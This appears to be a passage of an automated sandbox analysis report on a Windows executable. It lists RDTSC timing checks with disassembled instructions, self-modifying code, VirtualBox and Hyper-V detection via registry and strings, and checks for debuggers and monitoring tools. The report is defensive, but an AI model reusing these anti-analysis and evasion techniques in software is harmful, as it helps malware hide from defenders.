Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18D201B second address: 18D203A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7B216C3182h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18D203A second address: 18D203E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18D203E second address: 18D204C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C317Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1916BF8 second address: 1916BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1916BFC second address: 1916C00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1916C00 second address: 1916C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7B212E85C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1916C11 second address: 1916C17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19265E4 second address: 19265EE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7B212E85C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19265EE second address: 192661A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7B216C317Fh 0x00000009 jmp 00007F7B216C3189h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19F3696 second address: 19F36A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7B212E85C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19F36A1 second address: 19F36A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19F3933 second address: 19F3937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19F3937 second address: 19F3957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7B216C3176h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F7B216C317Bh 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19F3957 second address: 19F395D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19F3C8C second address: 19F3C95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19F3C95 second address: 19F3CA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19F3CA0 second address: 19F3CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19F3CA4 second address: 19F3CA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19F3CA8 second address: 19F3CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19F716A second address: 19F7185 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19F7185 second address: 19F718A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19F74F5 second address: 19F750E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7B212E85D5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19F750E second address: 19F7558 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F7B216C3189h 0x0000000e nop 0x0000000f mov dx, bx 0x00000012 push 00000004h 0x00000014 push eax 0x00000015 mov dword ptr [ebp+129C1CC8h], ecx 0x0000001b pop edx 0x0000001c push 86BE0463h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F7B216C3183h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19F7888 second address: 19F7892 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7B212E85CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19F7892 second address: 19F78BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F7B216C317Fh 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7B216C317Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19FA73C second address: 19FA740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19FA740 second address: 19FA762 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C3186h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F7B216C3176h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19FA762 second address: 19FA766 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19FA341 second address: 19FA345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19FA345 second address: 19FA349 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19FC11E second address: 19FC12E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7B216C317Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19FC12E second address: 19FC134 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10024 second address: 6E1004B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007F7B216C3184h 0x0000000b mov cx, 8271h 0x0000000f pop ecx 0x00000010 popad 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1004B second address: 6E1004F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1004F second address: 6E10053 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10053 second address: 6E10059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10059 second address: 6E10074 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C317Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10074 second address: 6E10078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10078 second address: 6E1007E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1007E second address: 6E10116 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov esi, 53CF4BA7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 mov ax, 089Fh 0x00000014 push ecx 0x00000015 push edx 0x00000016 pop eax 0x00000017 pop edi 0x00000018 popad 0x00000019 mov eax, dword ptr fs:[00000030h] 0x0000001f pushad 0x00000020 jmp 00007F7B212E85D8h 0x00000025 mov bx, cx 0x00000028 popad 0x00000029 sub esp, 18h 0x0000002c jmp 00007F7B212E85CCh 0x00000031 xchg eax, ebx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007F7B212E85CDh 0x0000003b or ax, CDD6h 0x00000040 jmp 00007F7B212E85D1h 0x00000045 popfd 0x00000046 pushfd 0x00000047 jmp 00007F7B212E85D0h 0x0000004c and esi, 6816CBF8h 0x00000052 jmp 00007F7B212E85CBh 0x00000057 popfd 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10116 second address: 6E1011C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1011C second address: 6E10120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10120 second address: 6E10124 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10124 second address: 6E1017D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b call 00007F7B212E85CAh 0x00000010 pop ecx 0x00000011 pushfd 0x00000012 jmp 00007F7B212E85CBh 0x00000017 sub ax, CC6Eh 0x0000001c jmp 00007F7B212E85D9h 0x00000021 popfd 0x00000022 popad 0x00000023 movzx ecx, bx 0x00000026 popad 0x00000027 xchg eax, ebx 0x00000028 pushad 0x00000029 mov ebx, 106597FCh 0x0000002e mov eax, edi 0x00000030 popad 0x00000031 mov ebx, dword ptr [eax+10h] 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1017D second address: 6E10181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10181 second address: 6E10187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10187 second address: 6E101A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C317Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bx, 5E06h 0x00000011 mov ecx, edx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E101A1 second address: 6E10236 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov cx, dx 0x0000000e pushfd 0x0000000f jmp 00007F7B212E85CDh 0x00000014 xor esi, 3F176616h 0x0000001a jmp 00007F7B212E85D1h 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, esi 0x00000022 jmp 00007F7B212E85CEh 0x00000027 mov esi, dword ptr [74E806ECh] 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov esi, ebx 0x00000032 pushfd 0x00000033 jmp 00007F7B212E85D9h 0x00000038 xor eax, 152C18D6h 0x0000003e jmp 00007F7B212E85D1h 0x00000043 popfd 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10236 second address: 6E1023E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10373 second address: 6E1039B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 jmp 00007F7B212E85CEh 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7B212E85CEh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1039B second address: 6E103F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7B216C3181h 0x00000009 xor ax, 1146h 0x0000000e jmp 00007F7B216C3181h 0x00000013 popfd 0x00000014 mov eax, 5D0F97F7h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, edi 0x0000001d pushad 0x0000001e call 00007F7B216C3188h 0x00000023 mov ebx, eax 0x00000025 pop esi 0x00000026 mov eax, ebx 0x00000028 popad 0x00000029 push dword ptr [eax] 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E103F7 second address: 6E103FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E103FB second address: 6E1040D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C317Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1040D second address: 6E1042C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000030h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F7B212E85CBh 0x00000016 push eax 0x00000017 pop edx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1042C second address: 6E10440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7B216C3180h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10440 second address: 6E10484 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [eax+18h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F7B212E85CBh 0x00000017 and ecx, 580E854Eh 0x0000001d jmp 00007F7B212E85D9h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E60BCF second address: 6E60BD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E60BD3 second address: 6E60BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E60BD9 second address: 6E60BDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E60BDF second address: 6E60BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E60BE3 second address: 6E60C74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C317Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push ecx 0x0000000e call 00007F7B216C317Dh 0x00000013 pop eax 0x00000014 pop edi 0x00000015 mov ax, 71CDh 0x00000019 popad 0x0000001a push eax 0x0000001b jmp 00007F7B216C3183h 0x00000020 xchg eax, ebp 0x00000021 jmp 00007F7B216C3186h 0x00000026 mov ebp, esp 0x00000028 pushad 0x00000029 mov di, si 0x0000002c pushfd 0x0000002d jmp 00007F7B216C317Ah 0x00000032 add si, C078h 0x00000037 jmp 00007F7B216C317Bh 0x0000003c popfd 0x0000003d popad 0x0000003e pop ebp 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F7B216C3185h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E00642 second address: 6E0066F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7B212E85CDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E0066F second address: 6E00676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E00676 second address: 6E006B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F7B212E85D5h 0x00000011 sbb si, 2186h 0x00000016 jmp 00007F7B212E85D1h 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E006B0 second address: 6E006B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E006B5 second address: 6E006E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7B212E85D5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E006E8 second address: 6E00719 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C3181h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007F7B216C3183h 0x00000013 pop esi 0x00000014 mov eax, ebx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E00719 second address: 6E0073B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, E773h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7B212E85D5h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe | Special instruction interceptor: First address: 1671BD7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe | Special instruction interceptor: First address: 18245AB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe | Special instruction interceptor: First address: 18A7DFE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe | Code function: 0_2_01179980 rdtsc 0_2_01179980
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe | TID: 7288 | Thread sleep time: -38019s >= -30000s
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe | TID: 7292 | Thread sleep time: -50025s >= -30000s
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe | TID: 7268 | Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe | TID: 7256 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe | Code function: 0_2_00F9255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00F9255D
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe | Code function: 0_2_00F929FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00F929FF
Source: f7qbEfJl0B.exe, f7qbEfJl0B.exe, 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: f7qbEfJl0B.exe | Binary or memory string: Hyper-V RAW
Source: f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: f7qbEfJl0B.exe, 00000000.00000003.2159624381.000000000076E000.00000004.00000020.00020000.00000000.sdmp, f7qbEfJl0B.exe, 00000000.00000003.2118952483.0000000000729000.00000004.00000020.00020000.00000000.sdmp, f7qbEfJl0B.exe, 00000000.00000002.2173176554.000000000077A000.00000004.00000020.00020000.00000000.sdmp, f7qbEfJl0B.exe, 00000000.00000003.2160083442.0000000000779000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~%[
Source: f7qbEfJl0B.exe, 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: f7qbEfJl0B.exe, 00000000.00000003.1767543389.0000000000713000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\f7qbEfJl0B.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\f7qbEfJl0B.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
